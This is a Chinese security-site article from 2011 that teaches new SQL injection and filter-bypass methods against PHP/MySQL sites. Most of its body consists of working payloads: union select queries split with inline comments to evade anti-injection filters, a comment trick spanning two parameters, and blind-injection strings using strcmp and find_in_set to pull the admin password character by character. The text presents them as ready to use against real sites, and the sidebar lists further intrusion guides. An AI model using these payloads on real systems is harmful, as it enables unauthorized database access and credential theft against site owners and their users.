首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
sqlinjection下的新型注入&绕过方式
来源:vfocus.net 作者:vfocus 发布时间:2011-06-07  
自sql注入发展至今,许多安全文章似乎扭曲了不少人的注射思维,传统的检测注射方法是通过: 
and 1=1 , and 1=2 来判断真假从而判断是否过滤完全,当然,也有 or 1=2,or 1=1,或者 在数值注射 例如:id=1+1 或id=2-1,等等 
本文的目的不是评判谁的检测方法实用,只是向大家推荐一些新的注射方式,可能早有人提及了:)  
注:主要针对php下的mysql注射,可借鉴,就不一一介绍了  
首先说判断:  
Null值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null  
或: and 2<=3   
其实,很多人习惯性的用=号来判断了,但是,如: >= ,<= ,is null,is not null,<>等 都可用于判断
 接着说注入  
对于注射取值,我们熟悉的就是union select 和 blind sqlinjection(盲注) 
先说Union Select 
对于常规的注射,我们可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4  
Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4  够恶心吧?可绕过国内所有防注射哦:) 这代码运行后效果如上,至于原理我希望大家自己去查查相关资料,有异议的可给我留言 
当然,在语句传递多个参数时 例如 slect * from table where id = 1 and name = xxx  ,我们可这么做: 
id=1+union/*&name=*/select+1,2  
代入查询后 slect * from table where id = 1 union /* and name = xxx */ select 1,2 这是一种让常量(变量)失效的技巧,当然,环境要求比较苛刻 :)
 
下面说说Blind SqlIjection(盲注):  
一般方式,我想大家应该是这么做的: ascii(substring(password,1,1))=56,或者是     ord(mid(password,1,1))=56  
在此,我推荐大家还是用子查询,当然,前提是猜出表,字段,可更为准确的得到想得到的数据  
此前,仍然向大家推荐一些新型的手法:  
find_in_set 例: find_in_set('56',ascii(substr(password,1,1)))=1 
strcmp 例: strcmp(left('password',1), 0x56) = 1
 
将这些函数套如子查询就是:  
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x55)=1 false 
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x56)=0    true 
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0x57)=-1   false 
不明白原理的请查阅函数手册或给我留言 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·()括号代替空格继续注入
·Discuz! NT 后台拿webshell
·特殊的php上传漏洞再到获取linux
·渗透路路破解通关游戏服务器(图
·草尼马入侵记 – 莫待无花空折枝
·草尼马入侵记- 杜秋娘劝君莫惜金
·Blogbus XSS利用——XSS Worm
·伪静态注入中转
·绕过
·
测试xss如何获得目标机器系统权
·使用PHP突破Disable_functions执
·用IIS6.0的文件解析缺陷留后门
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved